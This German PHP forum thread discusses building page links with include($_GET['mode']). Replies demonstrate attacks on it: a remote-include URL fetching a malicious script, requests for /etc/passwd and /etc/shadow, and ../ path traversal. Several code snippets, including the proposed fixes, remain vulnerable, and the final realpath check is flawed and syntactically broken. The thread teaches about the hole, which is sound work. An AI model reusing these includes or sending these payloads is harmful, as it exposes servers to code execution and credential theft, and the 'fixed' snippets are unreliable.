Hi.

wie mach ich die links so:

index.php?mode=register ?
Danke. Bis denne

Ich glaube ich weiss, was du vor hast:

include($_GET['mode']);

http://tut.php-q.net/frames.html

das knnte dir helfen

Original geschrieben von Corvin Grning
include($_GET['mode']);

Aufruf:

index.php?mode=http%3A%2F%2Fwww.example.com%2Fb%F6ses_skript.txt

;)

Kein Problem. Einfach diese Abfrage einbauen ;-)


$mode=strip_tags($_GET['mode']);
if(file_exists($mode)){
include($mode);
}
else{
include("default.txt");
}

index.php?mode=/etc/passwd
index.php?mode=/etc/shadow

*g*

Danke, Leute. Echt netter support.;)

Original geschrieben von bazubi
index.php?mode=/etc/passwd
index.php?mode=/etc/shadow

*g*

Dann machen wir halt noch einen Ordner "seiten" in den alle Dateien reinkommen, die wir includen wollen ;-)


$mode=strip_tags($_GET['mode']);
if(file_exists($mode)){
include("./seiten/" . $mode);
}
else{
include("./seiten/default.txt");
}

Ist trotzdem noch nicht sicher!

index.php?mode=../../../../../../../../../../../../etc/passwd

Die ../../ kann man beliebig verlngern - stren nicht weiter wenn es ein paar zuviel sind!

Einfach Array-Include nehmen, dann hat man genau unter Kontrolle was geladen werden kann und was nicht, siehe dazu http://tut.php-q.net/frames.html

Oder das ganze mit realpath auflsen.


if (file_exists('./seiten/' . realpath($_GET['mode'])) {
include ...
}